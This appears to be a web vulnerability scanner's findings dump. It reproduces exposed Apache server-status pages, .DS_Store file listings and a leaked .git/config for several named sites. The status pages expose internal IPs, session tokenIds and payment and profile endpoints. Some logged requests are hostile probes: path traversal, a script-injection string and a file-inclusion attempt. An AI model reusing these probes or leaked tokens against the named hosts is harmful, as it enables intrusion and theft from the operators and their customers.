0-1039180000/4/167130_ 0.20072260303900.00.02960.84 23.203.63.47
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce3c1463ce
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Monday, 20-Oct-2025 12:42:02 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 11 Parent Server MPM Generation: 10 Server uptime: 6 days 16 hours 23 minutes 59 seconds Server load: 0.03 0.06 0.01 Total accesses: 34734803 - Total Traffic: 190.7 GB - Total Duration: 6435616544 CPU Usage: u21.51 s23.51 cu25473.2 cs12843.9 - 6.64% CPU load 60.2 requests/sec - 346.4 kB/second - 5.8 kB/request - 185.279 ms/request 9 requests currently being processed, 0 workers gracefully restarting, 141 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 03918000no25yes30470241 13917466yes1no000000 33917738no26yes20480222 43917844no34yes40460291 Sum4186 901410754 _W_______________W____________________________W___...G.......... ................................................................ ......................_____________________________________W__W_ _______________W_______________W_______W_________W________...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1039180000/5/167234_ 0.220112262454160.00.02963.67 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=OILA000 0-10391800012/5/167800W 0.2200256836190.00.03962.60 23.212.50.121http/1.1www.medplusmart.com:443POST /my-profile/getInvoiceItems HTTP/1.1 0-1039180000/6/167254_ 0.26010264637450.00.03956.52 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-1039180000/5/167234_ 0.22053274139840.00.02932.09 23.50.232.156http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/4/167926_ 0.22092261073690.00.03938.32 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCompositionProductDetails HTTP/1.1 0-1039180000/5/167639_ 0.22099267155920.00.01950.89 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=MEDI036 0-1039180000/5/167385_ 0.2709261769680.00.02962.02 23.203.63.47http/1.1www.medplusmart.com:443GET /storelocator?srsltid=AfmBOooAz6fYJqwKtZAPDVnGDdLKaffBkY8ms 0-1039180000/6/167738_ 0.2609311297380.00.09959.32 95.101.181.71http/1.1www.medplusmart.com:443GET /server-status HTTP/1.1 0-1039180000/6/166796_ 0.260295398466080.00.02945.21 23.57.76.18http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-1039180000/5/167988_ 0.220106265654040.00.03939.91 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-1039180000/5/167562_ 0.220380282660600.00.02958.93 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-checkout/v1/secure/payment/processPayment?tokenId=E1 0-1039180000/5/167835_ 0.25166255466920.00.01956.79 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/5/167118_ 0.251115265022110.00.02949.75 23.57.76.18http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=DEPR001 0-1039180000/4/167188_ 0.23122262247720.00.01931.57 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=9BFFC7D488D38B10B417E7217 0-1039180000/4/167600_ 0.22019258875030.00.01963.14 23.11.215.79http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-1039180000/4/167300_ 0.22214266078150.00.02955.47 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-1039180000/3/167580_ 0.2708269741670.00.01972.30 23.62.101.22http/1.1www.medplusmart.com:443GET /mp/ct-brain-plain?gad_source=1&gad_campaignid=18133310833& 0-10391800014/3/167131W 0.1700266787870.00.01968.01 23.212.50.119http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=FD59C7B56CFE508EDD5007 0-1039180000/5/167102_ 0.23111265684330.00.01967.65 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=537EF158AB2F 0-1039180000/3/167502_ 0.222130257196770.00.01941.13 23.203.63.47http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=9BFFC7D488D38B 0-1039180000/4/167485_ 0.23192257404770.00.02960.32 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-1039180000/4/167135_ 0.2322272215130.00.01933.67 23.11.215.85http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-1039180000/4/166692_ 0.25125268315710.00.01923.86 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-1039180000/5/167080_ 0.23147285038110.00.02936.27 95.101.181.71http/1.1www.medplusmart.com:443GET /product/argigold-f-cap_argi0049 HTTP/1.1 0-1039180000/5/167385_ 0.23113261692260.00.03970.70 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-checkout/getOrderType?cartId=31703390&tokenId=E10DFD2 0-1039180000/5/167436_ 0.25145260477680.00.03929.41 23.50.232.156http/1.1www.medplusmart.com:443GET /product/dosi-flow-1-regulator-iv_dosi0003?srsltid=AfmBOopd 0-1039180000/4/167049_ 0.23217263376080.00.02952.73 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=9BFFC7D488D38B 0-1039180000/3/167277_ 0.201288261306100.00.03978.95 95.101.181.71http/1.1www.medplusmart.com:443GET /product/dermadew-acne-75gm-soap_derm0025 HTTP/1.1 0-1039180000/4/167443_ 0.23127263474960.00.02921.63 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=9BFFC7D488D38B10B417E7217 0-1039180000/5/166987_ 0.2318261166050.00.02928.52 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getRetryPaymentInfoForCustomer?tokenId=9BFFC7D4 0-1039180000/4/166745_ 0.2317286195000.00.01944.90 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-1039180000/5/166305_ 0.24117301846490.00.02928.73 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=A4166E9D0D9CDA 0-1039180000/5/166547_ 0.2518263655270.00.02933.25 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=A4166E9D0D9C 0-1039180000/4/166859_ 0.20121311106910.00.01985.48 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getPaymentDetails HTTP/1.1 0-1039180000/5/166917_ 0.25172270786240.00.02925.24 23.65.124.43http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=A3A6D54EA5E9D9C90BD358 0-1039180000/5/166483_ 0.2517311667130.00.02952.41 95.101.181.71http/1.1www.medplusmart.com:443GET /actuator/env HTTP/1.1 0-1039180000/4/167464_ 0.20122256249030.00.01979.32 23.57.76.18http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=5795514BAC2875CD873693FC6 0-1039180000/4/167130_ 0.20172260303900.00.02960.84 23.2
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d404782479c41899b9a8991000a0ac16e5b93ee1
Found 35 files trough .DS_Store spidering: /.git /.gitignore /en /en/.env.example /en/.gitignore /en/.htaccess /en/accessibility /en/app /en/assets /en/assets/css /en/assets/favicon.png /en/assets/fonts /en/assets/img /en/assets/img/CT_Safe_travels_chelsea+WTTC+TIAO outline.jpg /en/assets/img/CT_Safe_travels_chelsea+WTTC+TIAO outline.png /en/assets/img/home-map.jpg /en/assets/img/icons /en/assets/img/map /en/assets/img/pride-header.jpg /en/assets/img/promo /en/assets/img/rainbow-header.png /en/assets/js /en/assets/style copy.css /en/assets/style.css /en/assets/video /en/composer.json /en/composer.lock /en/customException.php /en/functions.php /en/index.php /en/seed.php /en/sitemap.xml /en/static /en/subscribe.html /index.php
Severity: low
Fingerprint: 5f32cf5d6962f09c684e525d684e525dc7912d967d335b1d4382c4a972254df4
Found 27 files trough .DS_Store spidering: /.git /.gitignore /en /en/.env.example /en/.gitignore /en/.htaccess /en/accessibility /en/app /en/assets /en/assets/css /en/assets/favicon.png /en/assets/fonts /en/assets/img /en/assets/js /en/assets/style copy.css /en/assets/style.css /en/assets/video /en/composer.json /en/composer.lock /en/customException.php /en/functions.php /en/index.php /en/seed.php /en/sitemap.xml /en/static /en/subscribe.html /index.php
Severity: low
Fingerprint: 5f32cf5d6962f09c0215adfc0215adfc60548171b83cd2d8749b016e7fe04e71
Found 4 files trough .DS_Store spidering: /.git /.gitignore /en /index.php
Severity: low
Fingerprint: 5f32cf5d6962f09cdc57c57adc57c57a06acecbf9c4944aeb975a760bda3e727
Found 19 files trough .DS_Store spidering: /.git /.gitignore /en /en/.env.example /en/.gitignore /en/.htaccess /en/accessibility /en/app /en/assets /en/composer.json /en/composer.lock /en/customException.php /en/functions.php /en/index.php /en/seed.php /en/sitemap.xml /en/static /en/subscribe.html /index.php
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522c3dc6201
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@gitlab.com:qodesales/chelseatoronto.net.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cca754a15
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 02-Jul-2024 12:37:09 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 2 hours 33 minutes 45 seconds Server load: 0.26 0.11 0.03 Total accesses: 621477 - Total Traffic: 12.2 GB - Total Duration: 132579497 CPU Usage: u82.19 s236.47 cu921.04 cs590.26 - .191% CPU load .648 requests/sec - 13.3 kB/second - 20.6 kB/request - 213.33 ms/request 37 requests currently being processed, 35 idle workers _KKK_K_RKRRK._R__._._____.K.RK_.__.._._R____RKK_K____RKK.KK_R_R_ RR.__K._......_...._KKW.R_.R..RR..R...K......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-013200/19/5864_ 0.031181413308190.00.05273.49 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0132622/117/5767K 0.305313868724188.61.51220.19 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0192083/150/5591K 0.422421119484817.30.77114.53 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-02243530427/95963/95963K 101.6541101334176063.1171.94171.94 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-024910/77/5237_ 0.201124611448700.00.45159.17 10.253.106.168http/1.1 5-02243730427/95963/95963K 107.3010101558176079.0171.95171.95 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-048530/23/5326_ 0.052511112119540.00.05155.75 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-032690/203/5904R 0.544801216217610.01.04250.78 10.253.106.191http/1.1 8-0166588/274/5662K 0.9011713112837122.52.24107.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-038200/173/5477R 0.435621110579160.00.5473.56 10.253.106.168http/1.1 10-024920/151/5355R 0.4562758614520050.00.86101.32 10.253.106.191http/1.1 11-0132723/234/5048K 0.66113188054954.80.9975.20 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 12-0-0/0/5298. 0.003499016614260.00.0087.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-024930/52/5682_ 0.141341114358250.00.42119.35 10.253.106.168http/1.1 14-024940/76/5619R 0.335601213730260.00.61104.75 10.253.106.191http/1.1 15-016110/132/5660_ 0.381151214597460.00.64201.94 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-044980/146/5198_ 0.461871112676180.00.91147.98 10.253.106.168http/1.1 17-0-0/0/5300. 0.004369014244660.00.0065.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-012720/468/5202_ 1.51911312650170.06.8767.79 10.253.106.191http/1.1 19-0-0/0/5623. 0.004006012853180.00.00270.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-024950/29/4993_ 0.071341214539100.00.0767.92 10.253.106.168http/1.1 21-032760/216/5905_ 0.54226119669640.00.98160.36 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /.git/config HTTP/1.1 22-016120/141/5284_ 0.362291112695000.00.53367.30 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 23-016130/59/4887_ 0.23167148925110.00.5280.97 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-016140/131/5102_ 0.412401313298490.00.80230.89 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0-0/0/5552. 0.003787012014560.00.00147.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-024961/85/5049K 0.242531212413112.50.31102.50 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0-0/0/4908. 0.004379013494270.00.00142.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-024970/181/4989R 0.604021312217230.01.04195.09 10.253.106.191http/1.1 29-0156883/299/5176K 0.761801211245597.32.39122.86 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-016150/52/5006_ 0.15258128465400.00.44173.45 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0-0/0/4973. 0.004381014384950.00.00215.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-016160/126/4806_ 0.292661114426710.00.33238.50 10.253.106.191http/1.1 33-032830/324/5019_ 0.94156129135890.01.5067.41 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 34-0-0/0/5049. 0.003797011061900.00.00123.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0-0/0/4963. 0.004382010180760.00.00111.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-016200/70/5290_ 0.17257119904960.00.17231.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0-0/0/5151. 0.004375010578440.00.00134.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-016210/96/4470_ 0.21229107427530.00.27218.46 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 39-025030/75/4967R 0.177041413258400.00.22213.34 10.253.106.168http/1.1 40-016220/137/4803_ 0.32225127595660.04.61266.89 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-016230/53/5147_ 0.2986138624790.00.31121.90 10.253.106.191http/1.1 42-016240/53/5509_ 0.15188112258550.01.74330.01 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/global/en/allergy-resources/se 43-025040/80/4924_ 0.1783129582330.02.7783.71 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-016250/78/4853R 0.19397149110100.00.3694.33 10.253.106.191http/1.1 45-0156911/159/4746K 0.421331115404822.10.97281.94 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 46-01738244/241/4970K 0.60276131298103107.60.80161.83 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-025050/15/4479_ 0.031411115062210.00.0472.81 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 48-0250636/94/4583K 0.342684274550588.42.84172.09
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cd8cf5f28
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 30-Jun-2024 05:13:59 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 8 days 19 hours 10 minutes 36 seconds Server load: 0.00 0.02 0.00 Total accesses: 503385 - Total Traffic: 10.9 GB - Total Duration: 126141263 CPU Usage: u53.55 s179.51 cu793.38 cs488.86 - .199% CPU load .662 requests/sec - 15.1 kB/second - 22.8 kB/request - 250.586 ms/request 27 requests currently being processed, 26 idle workers _RRK_K..K_R._R__RRR_.R_____R.__.RRR._____R_WRR_R..R.RR.R_R_R.... .__...R......................................_.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0259920/12/4885_ 0.043681012463330.00.10264.85 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 1-0282390/4/4691R 0.0054118109030.00.01204.58 10.253.106.168http/1.1 2-0285880/0/4596R 0.00646018688610.00.0094.83 10.253.106.191http/1.1 3-02243510488/76024/76024K 81.464182333139420.4136.15136.15 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0301570/0/4247_ 0.000010888970.00.00100.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-02243710488/76024/76024K 86.012083181139433.1136.17136.17 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0-0/0/4346. 0.0020011494460.00.00137.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0-0/0/4806. 0.00547015575540.00.00241.33 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0246816/10/4615K 0.0350380105541022.50.3091.92 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en-wo/support/rss-fee 9-088590/30/4519_ 0.0924489891000.00.2249.89 10.253.106.168http/1.1 10-0277630/1/4123R 0.00471413785970.00.0186.91 10.253.106.168http/1.1 11-0-0/0/3647. 0.006107991690.00.0061.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0295410/0/4411_ 0.00145016146130.00.0080.37 10.253.106.168http/1.1 13-0282410/0/4965R 0.00531013805550.00.00114.24 10.253.106.168http/1.1 14-0295420/0/4578_ 0.0063012820450.00.0089.20 10.253.106.191http/1.1 15-0114740/7/4500_ 0.023271013858820.00.04194.17 10.253.106.191http/1.1 16-0285910/1/4369R 0.006381011891530.00.0083.33 10.253.106.191http/1.1 17-0285920/0/4470R 0.00638013712220.00.0058.11 10.253.106.191http/1.1 18-0259940/1/4115R 0.00555011730400.00.0055.36 10.253.106.191http/1.1 19-096720/1/4701_ 0.00333812061870.00.01261.45 10.253.106.168http/1.1 20-0-0/0/4239. 0.00331014037680.00.0063.70 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0285930/0/4897R 0.0063708997840.00.00150.67 10.253.106.191http/1.1 22-0277710/1/4340_ 0.003683112015530.00.00356.64 10.253.106.191http/1.1 23-077740/46/4037_ 0.2219508194660.02.2074.50 10.253.106.191http/1.1 24-0256410/4/4083_ 0.003274211318670.00.02221.77 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /allergy/gb/en/resources/clinical-resources/pdf/anaphylaxis 25-057280/14/4636_ 0.20327711180200.01.7888.07 10.253.106.191http/1.1 26-0296500/0/4080_ 0.0022011764820.00.0086.05 10.253.106.191http/1.1 27-0285940/0/4034R 0.00635012728520.00.00130.82 10.253.106.191http/1.1 28-0-0/0/3985. 0.00325010633360.00.00184.53 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0296520/0/4358_ 0.0022010628810.00.00116.63 10.253.106.191http/1.1 30-0282460/8/3988_ 0.0136747882690.00.02143.88 10.253.106.168http/1.1qa1-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 31-0-0/0/3862. 0.00498012434370.00.00122.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0259960/0/4061R 0.00550013325050.00.00227.54 10.253.106.168http/1.1 33-0241400/6/4041R 0.04369108624950.00.0858.77 10.253.106.168http/1.1 34-0104340/20/4091R 0.2636919879950.00.7594.70 10.253.106.168http/1.1 35-0-0/0/3996. 0.005909406980.00.0057.50 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-096740/2/4215_ 0.013111199319440.00.04218.77 10.253.106.168http/1.1 37-0246840/0/4482_ 0.006209967600.00.00127.84 10.253.106.168http/1.1 38-093360/8/3664_ 0.031837035420.00.12210.66 10.253.106.191http/1.1 39-035730/11/4054_ 0.083676312534630.01.19207.34 10.253.106.168http/1.1 40-0256450/5/3723_ 0.016256920190.00.11255.46 10.253.106.168http/1.1 41-0104350/6/4304R 0.03617107999630.00.08113.14 10.253.106.168http/1.1 42-0273590/0/4643_ 0.00145010570790.00.00322.67 10.253.106.168http/1.1 43-0886610/32/3856W 0.060087498110.23.7370.92 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 44-0273600/10/3818R 0.0266608521810.00.2788.76 10.253.106.191http/1.1 45-0104380/7/4008R 0.0255024614697710.00.26274.36 10.253.106.168http/1.1 46-0282480/1/3994_ 0.00236012350430.00.00154.87 10.253.106.168http/1.1 47-0104400/6/3575R 0.0345723614437970.00.1266.52 10.253.106.168http/1.1 48-0-0/0/3787. 0.001606996280.00.00163.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0-0/0/3944. 0.00548010302890.00.0040.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0241440/3/3677R 0.01500488855630.00.01115.37 10.253.106.168http/1.1 51-0-0/0/4147. 0.00968013969690.00.0078.84 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0277720/1/3743R 0.005009411244750.00.0864.96 10.253.106.168http/1.1 53-0241520/0/3727R 0.00500013663200.00.0094.74 10.253.106.168http/1.1 54-0-0/0/3794. 0.001464011011920.00.0047.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-0242190/13/3143
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c6427d6ff
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 28-Jun-2024 08:08:09 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 22 hours 4 minutes 46 seconds Server load: 0.01 0.03 0.00 Total accesses: 410083 - Total Traffic: 9.5 GB - Total Duration: 117888996 CPU Usage: u45.59 s138.78 cu670.36 cs394.81 - .209% CPU load .686 requests/sec - 16.7 kB/second - 24.3 kB/request - 287.476 ms/request 39 requests currently being processed, 38 idle workers __KKKK_KW___K_KRRRR_K_RKK_RRR____K_K_RR_R____KK....K.._.....R.R_ ...._R...R.._RR.__._._._R._.__K_KR.K__K._._..................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-065300/11/4021_ 0.0110811835810.00.01197.29 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-dependencies.m 1-0244540/12/3860_ 0.014217577810.00.02191.97 10.253.106.168http/1.1qa1.allergyinsider.com:80POST /Collector/diagnostics/ping HTTP/1.1 2-0244571/20/3633K 0.0415320150644229.20.0685.90 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/dataTables.min.js 3-02243559789/59789/59789K 61.134161388109577.5107.01107.01 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0289851/125/3427K 0.51153610228652.31.0594.00 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-image 5-02243759789/59789/59789K 63.802061722109587.5107.02107.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0180280/76/3597_ 0.1771132410843070.00.20129.33 10.253.106.191http/1.1 7-0244585/16/3991K 0.021536149480631.10.05230.40 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-dependencies.m 8-0244639/57/3889W 0.11009206729.60.1282.87 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 9-0289870/134/3428_ 0.3027128810790.00.6340.04 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=. 10-0244650/21/3504_ 0.04301213226250.00.0582.10 10.253.106.168http/1.1 11-084220/12/2963_ 0.0154117312620.00.0353.19 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28do 12-073884/6/3489K 0.0015371545907255.80.2570.19 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/magnific 13-073890/10/4020_ 0.01411113248190.00.0196.59 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /index.php?target=db_sql.php%253f/../../../../../../../../e 14-074052/17/3689K 0.03153812190954.30.0382.09 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 15-0112130/59/3617R 0.132841111909290.00.15183.15 10.253.106.191http/1.1 